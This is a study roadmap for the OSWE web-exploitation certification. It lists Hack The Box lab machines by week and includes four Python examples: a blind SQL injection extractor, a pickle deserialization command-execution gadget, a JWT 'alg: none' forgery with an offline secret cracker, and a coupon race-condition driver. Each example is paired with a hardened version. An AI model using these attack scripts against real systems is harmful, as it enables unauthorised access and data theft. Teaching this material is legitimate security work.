Advanced Web - OSWE Roadmap
This roadmap is inspired 100% by s4vitar's HackingVault and is designed as preparation for the OSWE (Offensive Security Web Expert) certification. The focus is purely advanced web (white box): source code review, insecure deserialization and filter bypass.
Objective: Build a code-review mindset and the habit of automating exploits (Python scripting).
Resource: The intellectual property and all video walkthroughs belong to the public S4viSinFiltro channel.
🟢 PHASE 1: WEB FUNDAMENTALS
WEEK 1: Web Architecture
Focus: Solid development and HTTP fundamentals.
Key Techniques: HTTP protocol deep dive, session management.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Admirer | Hack The Box | Easy | Watch 🎥 | Adminer / FTP |
| | Backdoor | Hack The Box | Easy | Watch 🎥 | WordPress / LFI |
| | Blunder | Hack The Box | Easy | Watch 🎥 | Bludit CMS |
| | Bounty | Hack The Box | Easy | Watch 🎥 | IIS / ASP |
| | BountyHunter | Hack The Box | Easy | Watch 🎥 | XXE |
WEEK 2: Client-Side Attacks
Focus: XSS, CSRF and clickjacking.
Key Techniques: XSS variants, CSRF chains.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Doctor | Hack The Box | Easy | Watch 🎥 | SSTI / Splunk |
| | Haystack | Hack The Box | Easy | Watch 🎥 | Elasticsearch |
| | Headless | Hack The Box | Easy | Watch 🎥 | XSS / Cookie Hijacking |
| | Laboratory | Hack The Box | Easy | Watch 🎥 | GitLab |
| | Late | Hack The Box | Easy | Watch 🎥 | SSTI (OCR) |
WEEK 3: SQL & NoSQL Injection
Focus: Advanced injection.
Key Techniques: Manual SQLi, NoSQL injection.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | MonitorsTwo | Hack The Box | Easy | Watch 🎥 | Cacti / Docker |
| | OpenSource | Hack The Box | Easy | Watch 🎥 | Gitea / Git Hooks |
| | PC | Hack The Box | Easy | Watch 🎥 | SQLMap / gRPC |
| | Perfection | Hack The Box | Easy | Watch 🎥 | SSTI / Ruby |
| | Postman | Hack The Box | Easy | Watch 🎥 | Redis / Webmin |
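Week 3's "manual SQLi" is where the OSWE habit of scripting a yes/no oracle pays off. The block below is an added example for this roadmap, not code from the page or from any of the machines listed: a constructed login handler over an in-memory SQLite table (the users and hashes are made up), the string-concatenation pattern that makes it injectable next to the parameterized version, and an extraction loop that binary-searches `unicode(substr(...))` so that each character costs about seven requests instead of one per candidate character. `REQUESTS` only counts calls so the request budget stays visible; against a real target `vulnerable_login` would be an HTTP request and `oracle` would inspect the response.

```python
import sqlite3

# --- Constructed target: an in-memory app with a string-built login query ----
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
_conn.executemany(
    "INSERT INTO users (username, password) VALUES (?, ?)",
    [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),   # constructed sample hash
     ("guest", "084e0343a1d2b4a4cb7a1e8c5c6e3d21")],  # constructed sample hash
)
REQUESTS = {"count": 0}  # number of "HTTP requests" the attacker has sent


def vulnerable_login(username, password):
    """Vulnerable pattern: user input is concatenated into the SQL text.
    The caller only learns True/False, so the injection is blind."""
    REQUESTS["count"] += 1
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return _conn.execute(query).fetchone() is not None


def safe_login(username, password):
    """Hardened pattern: bound parameters are never parsed as SQL."""
    row = _conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None


# --- Attacker side ------------------------------------------------------------
def oracle(condition):
    """Make the WHERE clause true iff `condition` holds; '-- ' drops the rest."""
    return vulnerable_login(f"admin' AND ({condition}) -- ", "x")


def extract(column, table, where, max_len=64):
    """Recover one field character by character with a binary search over
    printable ASCII (32..126): 7 oracle calls per character plus one length
    probe, versus up to 95 per character with a plain charset walk."""
    sub = f"(SELECT {column} FROM {table} WHERE {where})"
    out = ""
    for pos in range(1, max_len + 1):
        if oracle(f"length({sub}) < {pos}"):   # ran past the end of the value
            break
        lo, hi = 32, 126
        while lo < hi:                         # smallest v with char <= v is the char
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({sub}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def requests_used():
    return REQUESTS["count"]


if __name__ == "__main__":
    print("auth bypass:", vulnerable_login("admin' -- ", "anything"))
    print("admin hash:", extract("password", "users", "username = 'admin'"))
    print("requests:", requests_used())
```

The same loop is reused unchanged for any column once the table layout is known; what changes between engines is the character function (`unicode()` in SQLite, `ASCII()` in MySQL and PostgreSQL) and the comment syntax.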
WEEK 4: File Inclusion
Focus: LFI, RFI and path traversal.
Key Techniques: PHP wrappers, log poisoning.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | RedPanda | Hack The Box | Easy | Watch 🎥 | SSTI / XML |
| | Sea | Hack The Box | Easy | Watch 🎥 | WonderCMS |
| | Secret | Hack The Box | Easy | Watch 🎥 | JWT / API |
| | Sense | Hack The Box | Easy | Watch 🎥 | pfSense |
| | Shoppy | Hack The Box | Easy | Watch 🎥 | NoSQLi |
WEEK 5: XML & XXE (Part 1)
Focus: Attacks on XML parsers.
Key Techniques: Out-of-band XXE, XPath injection.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Sightless | Hack The Box | Easy | Watch 🎥 | SQLi / Chrome remote debugging |
| | Soccer | Hack The Box | Easy | Watch 🎥 | WebSocket SQLi |
| | SteamCloud | Hack The Box | Easy | Watch 🎥 | Kubernetes |
| | Stocker | Hack The Box | Easy | Watch 🎥 | NoSQLi / PDF generation |
| | SwagShop | Hack The Box | Easy | Watch 🎥 | Magento |
WEEK 6: XML & XXE (Part 2)
Focus: Continuation of XML vectors.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Teacher | Hack The Box | Easy | Watch 🎥 | Moodle |
| | Trick | Hack The Box | Easy | Watch 🎥 | SQLi / DNS |
| | TwoMillion | Hack The Box | Easy | Watch 🎥 | API Logic |
| | Usage | Hack The Box | Easy | Watch 🎥 | SQLi / Cookie |
🟠 PHASE 2: INTERMEDIATE LEVEL
WEEK 7: Template Engines (SSTI)
Focus: Server-Side Template Injection.
Key Techniques: Jinja2, Twig, FreeMarker, Smarty.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Awkward | Hack The Box | Medium | Watch 🎥 | JWT / API |
| | Backend | Hack The Box | Medium | Watch 🎥 | API |
| | BackendTwo | Hack The Box | Medium | Watch 🎥 | API |
| | Bart | Hack The Box | Medium | Watch 🎥 | PHP / Internal |
| | Blurry | Hack The Box | Medium | Watch 🎥 | ClearML (Pickle) |
WEEK 8: Deserialization (Fundamentals)
Focus: Java, PHP, Python.
Key Techniques: Object injection, basic gadgets.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Bolt | Hack The Box | Medium | Watch 🎥 | Bolt CMS / Templating |
| | Book | Hack The Box | Medium | Watch 🎥 | XSS / SQL Truncation |
| | BroScience | Hack The Box | Medium | Watch 🎥 | PHP Deserialization |
| | Cache | Hack The Box | Medium | Watch 🎥 | HMS / Docker |
| | Cat | Hack The Box | Medium | Watch 🎥 | Android / API |
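Week 8 lists Python among the languages, and Blurry's ClearML foothold in the previous week is the pickle case. The block below is an added example, not code from the page or from ClearML: `Gadget.__reduce__` turns an object into an instruction to call `subprocess.check_output`, `vulnerable_load` is plain `pickle.loads`, and `RestrictedUnpickler` is the mitigation documented in the `pickle` module itself (override `find_class` with an allow-list). The class, the command, the blobs and the allow-list are constructed for the demo; the command runs the interpreter only to keep the example portable, a real payload would be whatever shell command the attacker wants.

```python
import io
import pickle
import subprocess
import sys

# Constructed payload command: observable as the return value of pickle.loads.
COMMAND = [sys.executable, "-c", "print('pwned')"]


class Gadget:
    """Does not pickle as data: __reduce__ tells the unpickler to call
    subprocess.check_output(COMMAND) while 'reconstructing' the object.
    This is a one-step gadget chain; real chains link several such calls."""
    def __reduce__(self):
        return (subprocess.check_output, (COMMAND,))


def build_malicious_blob() -> bytes:
    """Attacker side. The victim never needs the Gadget class: the bytes only
    name a global (subprocess.check_output) and the arguments to call it with."""
    return pickle.dumps(Gadget())


def benign_blob() -> bytes:
    """Plain data, for contrast: no globals are referenced at all."""
    return pickle.dumps({"user": "alice", "tags": [1, 2, 3]})


def vulnerable_load(blob: bytes):
    """The pattern to flag in review: untrusted bytes straight into pickle.loads.
    For the malicious blob the 'object' that comes back is the command output."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Mitigation from the pickle docs: resolve only allow-listed globals."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def try_load(loader, blob: bytes):
    """Returns (result, error_message) so the two loaders can be compared."""
    try:
        return loader(blob), None
    except pickle.UnpicklingError as exc:
        return None, str(exc)


if __name__ == "__main__":
    blob = build_malicious_blob()
    print("vulnerable:", try_load(vulnerable_load, blob))
    print("restricted:", try_load(safe_load, blob))
```

The review takeaway: `pickle.loads` resolves whatever global the bytes name, so the question is never "is this class safe" but "can these bytes come from a user". Grep for `pickle.loads`, `yaml.load` without a safe loader and `marshal.loads` on anything that arrives from a request, a queue or a cache.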
WEEK 9: Authentication & OAuth
Focus: OAuth, SAML and bypasses.
Key Techniques: Token manipulation, logic flaws in login flows.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Catch | Hack The Box | Medium | Watch 🎥 | APK / API |
| | Celestial | Hack The Box | Medium | Watch 🎥 | Node Deserialization |
| | Clicker | Hack The Box | Medium | Watch 🎥 | NFS / Web Logic |
| | Cronos | Hack The Box | Medium | Watch 🎥 | DNS / SQLi |
| | DevOops | Hack The Box | Medium | Watch 🎥 | XML / Git |
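Token manipulation in week 9 comes down to what the verifier trusts. The block below is an added example, not code from the page or from any of the JWT machines in this roadmap (Secret, Awkward, Noter, TheNotebook, Unicode); it implements just enough of HS256 JWT with the standard library to show two findings a code review should look for. `SECRET`, the claims and the wordlist are constructed. A verifier that reads `alg` from the token accepts an `alg: none` forgery; a verifier that pins the algorithm does not; and a weak HMAC key is recovered offline from one captured token, after which even the pinned verifier accepts attacker-issued tokens.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"s3cret"   # constructed weak server key, deliberately in a wordlist


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def hs256(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def issue_token(sub: str, role: str, key: bytes = SECRET) -> str:
    signing_input = (encode_segment({"alg": "HS256", "typ": "JWT"}) + "."
                     + encode_segment({"sub": sub, "role": role}))
    return signing_input + "." + b64url(hs256(signing_input, key))


def vulnerable_verify(token: str, key: bytes) -> dict:
    """Lets the token choose the algorithm: alg=none skips the MAC check."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256" and hmac.compare_digest(
            hs256(f"{h}.{p}", key), b64url_decode(s)):
        return json.loads(b64url_decode(p))
    raise ValueError("invalid token")


def safe_verify(token: str, key: bytes) -> dict:
    """Pins the algorithm server-side and always checks the MAC."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(hs256(f"{h}.{p}", key), b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def accepted(verify, token: str, key: bytes = SECRET) -> bool:
    try:
        verify(token, key)
        return True
    except ValueError:
        return False


# --- Attacker side ------------------------------------------------------------
def forge_none(token: str, **claims) -> str:
    """Rewrite claims, set alg=none and leave the signature segment empty."""
    payload = json.loads(b64url_decode(token.split(".")[1]))
    payload.update(claims)
    return (encode_segment({"alg": "none", "typ": "JWT"}) + "."
            + encode_segment(payload) + ".")


def crack_secret(token: str, candidates):
    """Offline HS256 brute force: needs the captured token and no requests."""
    h, p, s = token.split(".")
    sig = b64url_decode(s)
    for key in candidates:
        if hmac.compare_digest(hs256(f"{h}.{p}", key), sig):
            return key
    return None


if __name__ == "__main__":
    tok = issue_token("guest", "user")
    print("none forgery accepted by weak verifier:",
          vulnerable_verify(forge_none(tok, role="admin"), SECRET))
    print("cracked key:", crack_secret(tok, [b"password", b"123456", b"s3cret"]))
```

`forge_none` and `crack_secret` are the attacker-side scripts. The second needs no traffic at all, which is why weak JWT secrets are such a common white-box finding: the key usually sits in a config file or the repository, and once it is known the server's own `issue_token` is the exploit.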
WEEK 10: API Security
Focus: GraphQL and REST.
Key Techniques: Introspection, mass assignment.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Encoding | Hack The Box | Medium | Watch 🎥 | PHP filters / Git |
| | Epsilon | Hack The Box | Medium | Watch 🎥 | |
| | Europa | Hack The Box | Medium | Watch 🎥 | Regex |
| | Faculty | Hack The Box | Medium | Watch 🎥 | mPDF / SQLi |
| | Flustered | Hack The Box | Medium | Watch 🎥 | Squid Proxy |
WEEK 11: WebSockets & CORS
Focus: Vulnerabilities in asynchronous communication.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | FluxCapacitor | Hack The Box | Medium | Watch 🎥 | WAF Bypass |
| | Forge | Hack The Box | Medium | Watch 🎥 | SSRF |
| | Format | Hack The Box | Medium | Watch 🎥 | Microblog / Lua |
| | Giddy | Hack The Box | Medium | Watch 🎥 | SQLi / Unquoted |
| | Health | Hack The Box | Medium | Watch 🎥 | Webhook / Filters |
WEEK 12: WebSockets & CORS (Part 2)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | IClean | Hack The Box | Medium | Watch 🎥 | XSS / SSTI |
| | Inception | Hack The Box | Medium | Watch 🎥 | WebDAV / Squid |
| | Interface | Hack The Box | Medium | Watch 🎥 | API / DOMpdf |
| | Jewel | Hack The Box | Medium | Watch 🎥 | Git / Deserialization |
| | Jupiter | Hack The Box | Medium | Watch 🎥 | Postgres / Grafana |
WEEK 13: WebSockets & CORS (Part 3)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Lazy | Hack The Box | Medium | Watch 🎥 | Padding Oracle |
| | Mango | Hack The Box | Medium | Watch 🎥 | NoSQLi |
| | Mentor | Hack The Box | Medium | Watch 🎥 | API |
| | Meta | Hack The Box | Medium | Watch 🎥 | ImageMagick |
| | Monitored | Hack The Box | Medium | Watch 🎥 | Nagios / API |
WEEK 14: WebSockets & CORS (Part 4)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | MonitorsThree | Hack The Box | Medium | Watch 🎥 | SQLi / Cacti |
| | Nineveh | Hack The Box | Medium | Watch 🎥 | Hyde / LFI |
| | Noter | Hack The Box | Medium | Watch 🎥 | Flask / JWT |
| | Obscurity | Hack The Box | Medium | Watch 🎥 | Custom Python server |
| | OnlyForYou | Hack The Box | Medium | Watch 🎥 | LFI / Neo4j |
WEEK 15: WebSockets & CORS (Part 5)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Passage | Hack The Box | Medium | Watch 🎥 | CuteNews |
| | Pov | Hack The Box | Medium | Watch 🎥 | |
| | Runner | Hack The Box | Medium | Watch 🎥 | TeamCity |
| | Schooled | Hack The Box | Medium | Watch 🎥 | Moodle / XSS |
| | Seal | Hack The Box | Medium | Watch 🎥 | Tomcat / GitBucket |
WEEK 16: WebSockets & CORS (Part 6)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | StreamIO | Hack The Box | Medium | Watch 🎥 | Firefox / Forensics |
| | Strutted | Hack The Box | Medium | Watch 🎥 | Apache Struts |
| | TartarSauce | Hack The Box | Medium | Watch 🎥 | WordPress |
| | TheNotebook | Hack The Box | Medium | Watch 🎥 | JWT / Docker |
| | Time | Hack The Box | Medium | Watch 🎥 | Java Deserialization |
WEEK 17: WebSockets & CORS (Part 7)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Timing | Hack The Box | Medium | Watch 🎥 | PHP / File Include |
| | Trickster | Hack The Box | Medium | Watch 🎥 | PrestaShop |
| | Undetected | Hack The Box | Medium | Watch 🎥 | PHP / ModSecurity |
| | Unicode | Hack The Box | Medium | Watch 🎥 | JWT / Unicode |
| | UpDown | Hack The Box | Medium | Watch 🎥 | File Upload |
WEEK 18: WebSockets & CORS (Part 8)
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Wall | Hack The Box | Medium | Watch 🎥 | API / Python |
| | Writer | Hack The Box | Medium | Watch 🎥 | SQLi / ImageMagick |
| | Zipping | Hack The Box | Medium | Watch 🎥 | Zip Slip |
🔴 PHASE 3: ADVANCED LEVEL (WHITE BOX)
WEEK 19: Advanced Deserialization
Focus: Custom gadget chains.
Key Techniques: POP chains, custom gadget chains.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | AdmirerToo | Hack The Box | Hard | Watch 🎥 | OpenCATS |
| | Altered | Hack The Box | Hard | Watch 🎥 | CodeIgniter / PHP |
| | Analysis | Hack The Box | Hard | Watch 🎥 | LDAP / Socket |
| | Breadcrumbs | Hack The Box | Hard | Watch 🎥 | Windows / SQLi |
WEEK 20: Type Juggling & Race Conditions
Focus: Logic errors at run time.
Key Techniques: Time-of-check/time-of-use attacks, type juggling.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Carpediem | Hack The Box | Hard | Watch 🎥 | Docker |
| | Charon | Hack The Box | Hard | Watch 🎥 | SQLi Union |
| | Control | Hack The Box | Hard | Watch 🎥 | MySQL |
| | CrimeStoppers | Hack The Box | Hard | Watch 🎥 | PHP / Zip |
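Week 20's time-of-check attacks are easiest to understand when the interleaving is forced rather than hoped for. The block below is an added example, not code from the page: a constructed single-use coupon store whose `vulnerable_redeem` checks and then acts with a gap between the two, a `safe_redeem` that makes check and act one atomic step, and a `race` driver that uses `threading.Barrier` so every concurrent request reaches the gap before any of them proceeds. The store, user and coupon code are made up. Type juggling, the other item of the week, is PHP's loose comparison and is not covered here.

```python
import threading

CREDIT = 10  # constructed value of one coupon


class CouponStore:
    """Constructed stand-in for an application's database layer."""

    def __init__(self):
        self.redeemed = set()
        self.balance = {}
        self.lock = threading.Lock()

    def _grant(self, user, code):
        self.redeemed.add(code)
        self.balance[user] = self.balance.get(user, 0) + CREDIT

    def vulnerable_redeem(self, user, code, window):
        if code in self.redeemed:           # time of check
            return False
        window()                            # the gap a parallel request lands in
        self._grant(user, code)             # time of use
        return True

    def safe_redeem(self, user, code, window):
        window()
        with self.lock:                     # check and use are one atomic step
            if code in self.redeemed:
                return False
            self._grant(user, code)
        return True


def race(kind, n=2, user="mallory", code="WELCOME10"):
    """Send n concurrent redemptions of the same single-use code and return
    (successful redemptions, credit granted). The Barrier makes every request
    reach the race window before any continues, so the outcome does not depend
    on timing: the vulnerable path grants n times, the safe path once."""
    store = CouponStore()
    redeem = store.vulnerable_redeem if kind == "vulnerable" else store.safe_redeem
    barrier = threading.Barrier(n)
    results, results_lock = [], threading.Lock()

    def worker():
        ok = redeem(user, code, barrier.wait)
        with results_lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), store.balance.get(user, 0)


if __name__ == "__main__":
    print("vulnerable:", race("vulnerable", n=5))
    print("safe:      ", race("safe", n=5))
```

On a real target the equivalent of `race` is sending the requests in parallel (HTTP/2 multiplexing or last-byte synchronisation) and counting how many succeed. The in-process lock in `safe_redeem` is only valid for a single worker; across workers or hosts the fix has to live in the database, for example an atomic `UPDATE coupons SET used = 1 WHERE code = ? AND used = 0` followed by a check of the affected row count, or a unique constraint on the redemption row.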
WEEK 21: Advanced SSTI
Focus: Sandbox escape and filter bypass.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Dab | Hack The Box | Hard | Watch 🎥 | Windows |
| | Drive | Hack The Box | Hard | Watch 🎥 | SQLite / API |
| | EarlyAccess | Hack The Box | Hard | Watch 🎥 | PHP / Keygen |
| | Falafel | Hack The Box | Hard | Watch 🎥 | PHP / SQLi |
WEEK 22: Code Review & Logic Flaws I
Focus: Custom frameworks and source code review.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Feline | Hack The Box | Hard | Watch 🎥 | Tomcat / Java Deserialization |
| | Flujab | Hack The Box | Hard | Watch 🎥 | |
| | Freelancer | Hack The Box | Hard | Watch 🎥 | SQLi / MSSQL |
| | Hancliffe | Hack The Box | Hard | Watch 🎥 | Unity / SSRF |
WEEK 23: Code Review & Logic Flaws II
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Holiday | Hack The Box | Hard | Watch 🎥 | Node / SQLi |
| | Joker | Hack The Box | Hard | Watch 🎥 | Squid |
| | Kotarak | Hack The Box | Hard | Watch 🎥 | Tomcat |
| | Moderators | Hack The Box | Hard | Watch 🎥 | WordPress / Logs |
WEEK 24: Code Review & Logic Flaws III
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Monitors | Hack The Box | Hard | Watch 🎥 | WordPress |
| | Object | Hack The Box | Hard | Watch 🎥 | Jenkins |
| | Oouch | Hack The Box | Hard | Watch 🎥 | DBus / OAuth |
| | Overflow | Hack The Box | Hard | Watch 🎥 | Padding Oracle / Cookie |
WEEK 25: Code Review & Logic Flaws IV
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Overgraph | Hack The Box | Hard | Watch 🎥 | |
| | Oz | Hack The Box | Hard | Watch 🎥 | Docker / Port Knocking |
| | Phoenix | Hack The Box | Hard | Watch 🎥 | WordPress |
| | Player | Hack The Box | Hard | Watch 🎥 | GraphQL / FFmpeg |
WEEK 26: Code Review & Logic Flaws V
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Pressed | Hack The Box | Hard | Watch 🎥 | WordPress |
| | Quick | Hack The Box | Hard | Watch 🎥 | HTTP/2 / ESI Injection |
| | Static | Hack The Box | Hard | Watch 🎥 | PHP / Gzip |
| | Talkative | Hack The Box | Hard | Watch 🎥 | Jamovi |
WEEK 27: Code Review & Logic Flaws VI
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Tentacle | Hack The Box | Hard | Watch 🎥 | Squid / Kerberos |
| | Travel | Hack The Box | Hard | Watch 🎥 | SSRF / Gopher |
| | Unbalanced | Hack The Box | Hard | Watch 🎥 | Rsync / EncFS |
| | Unobtainium | Hack The Box | Hard | Watch 🎥 | Kubernetes |
WEEK 28: Insane Challenges I
Focus: Insane machines.
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Yummy | Hack The Box | Hard | Watch 🎥 | MVC |
| | Anubis | Hack The Box | Insane | Watch 🎥 | Container Breakout |
| | Ariekei | Hack The Box | Insane | Watch 🎥 | Docker / Ansible |
| | Bankrobber | Hack The Box | Insane | Watch 🎥 | XSS / SQLi / Wrapper |
WEEK 29: Insane Challenges II
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Bookworm | Hack The Box | Hard | Watch 🎥 | |
| | CTF | Hack The Box | Insane | Watch 🎥 | LDAP / Token |
| | Crossfit | Hack The Box | Insane | Watch 🎥 | XSS / FTP |
| | Fighter | Hack The Box | Hard | Watch 🎥 | |
WEEK 30: Insane Challenges III
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Fortune | Hack The Box | Insane | Watch 🎥 | OpenBSD |
| | Fulcrum | Hack The Box | Hard | Watch 🎥 | Redis |
| | Hackback | Hack The Box | Insane | Watch 🎥 | XML / JSON |
| | MagicGardens | Hack The Box | Insane | Watch 🎥 | Django / SSTI |
WEEK 31: Insane Challenges IV
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Minion | Hack The Box | Insane | Watch 🎥 | ASP / SQLi |
| | Mischief | Hack The Box | Hard | Watch 🎥 | IPv6 / SNMP |
| | MultiMaster | Hack The Box | Hard | Watch 🎥 | AD / MSSQL |
| | Nightmare | Hack The Box | Insane | Watch 🎥 | SQLi / Buffer Overflow |
WEEK 32: Final Stretch
| Status | Machine | Platform | Difficulty | Walkthrough | Notes |
|---|---|---|---|---|---|
| | Sink | Hack The Box | Insane | Watch 🎥 | HTTP Headers |
| | Stacked | Hack The Box | Insane | Watch 🎥 | XSS / LocalStack |
| | Toby | Hack The Box | Medium | Watch 🎥 | Docker / Jenkins |